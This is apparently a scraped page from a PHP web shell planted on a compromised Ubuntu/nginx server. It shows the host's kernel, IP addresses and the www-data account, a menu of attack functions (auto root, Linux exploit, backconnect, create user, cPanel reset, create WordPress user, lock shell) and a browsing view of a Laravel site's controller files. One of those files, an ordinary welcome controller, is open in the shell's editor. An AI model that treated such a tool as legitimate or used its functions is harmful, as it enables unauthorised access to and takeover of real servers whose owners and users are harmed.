Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
app /
Http /
Controllers /
[ HOME SHELL ]
Name
Size
Permission
Action
Admin
[ DIR ]
drwxr-xr-x
Auth
[ DIR ]
drwxr-xr-x
Authentication
[ DIR ]
drwxr-xr-x
Product
[ DIR ]
drwxr-xr-x
Setting
[ DIR ]
drwxr-xr-x
User
[ DIR ]
drwxr-xr-x
Controller.php
374
B
-rw-r--r--
HomeController.php
19.22
KB
-rw-r--r--
HomeController_09.php
19.22
KB
-rw-r--r--
HomeController_09282018.php
19.22
KB
-rw-r--r--
HomeController_backup.php
18.83
KB
-rw-r--r--
HomeController_l.php
9.54
KB
-rw-r--r--
HomeController_old.php
18.83
KB
-rw-r--r--
OrderController.php
14.55
KB
-rw-r--r--
OrderController_old.php
14.55
KB
-rw-r--r--
OrderPaymentController.php
6.73
KB
-rw-r--r--
OrderPaymentController_old.php
6.73
KB
-rw-r--r--
SuperAdminController.php
3.59
KB
-rw-r--r--
SuperAdminController_old.php
3.61
KB
-rw-r--r--
WelcomeController.php
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WelcomeController.php
<?php namespace App\Http\Controllers; use App\Model\Pages; use App\Model\Product\Product; use App\Model\Product\Product_rate; use App\Model\Banner; use Illuminate\Http\Request; use App\Http\Controllers\Controller; class WelcomeController extends Controller { public function welcome() { $welcome['about_us'] = Pages::where(['type'=>'about-us','status'=>'published'])->first(); $welcome['ceo_message'] = Pages::where(['type'=>'ceo-message','status'=>'published'])->first(); $welcome['contact_us'] = Pages::where(['type'=>'contact-us','status'=>'published'])->first(); $welcome['company_profile'] = Pages::where(['type'=>'company-profile','status'=>'published'])->first(); $welcome['our_partners'] = Pages::where(['type'=>'our-partners','status'=>'published'])->first(); $welcome['our_vision'] = Pages::where(['type'=>'our-vision','status'=>'published'])->first(); $welcome['products'] = Product::with('productRate')->where('status','published')->get(); return view('welcome',compact('welcome')); } }
Close